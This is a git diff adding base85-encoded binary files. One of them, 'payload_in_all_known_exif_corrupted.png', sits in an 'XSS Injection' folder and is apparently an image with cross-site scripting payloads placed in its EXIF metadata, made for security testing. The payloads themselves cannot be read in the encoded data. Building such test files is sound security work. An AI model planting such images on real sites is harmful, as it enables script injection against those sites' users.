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
bM@!PzxUYRxy6%|)mZX4)C`wq&|8D{SLIMm=

literal 0
HcmV?d00001

diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.png b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png
new file mode 100644
index 0000000000000000000000000000000000000000..17b6266c75830e793ec9820b36171a353325ff0f
GIT binary patch
literal 45572
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
